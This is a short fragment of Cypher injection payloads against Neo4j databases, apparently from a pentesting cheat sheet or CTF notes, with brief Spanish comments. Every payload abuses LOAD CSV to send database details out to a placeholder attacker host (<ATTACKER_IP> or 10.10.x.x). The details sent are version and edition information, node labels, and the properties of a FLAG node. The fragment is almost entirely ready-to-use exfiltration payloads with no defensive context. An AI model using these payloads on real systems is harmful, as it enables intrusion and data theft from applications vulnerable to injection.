' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://<ATTACKER_IP>/?version='+version+'&name='+name+'&edition='+edition as l RETURN 0 as _0 //
Labels (like columns)
' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<ATTACKER_IP>/?l='+label as l RETURN 0 as _0 //
Get information from labels (data)
Reemplazar FLAG por la correspondiente
' OR 1=1 WITH 1 as a MATCH (f:FLAG) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //"
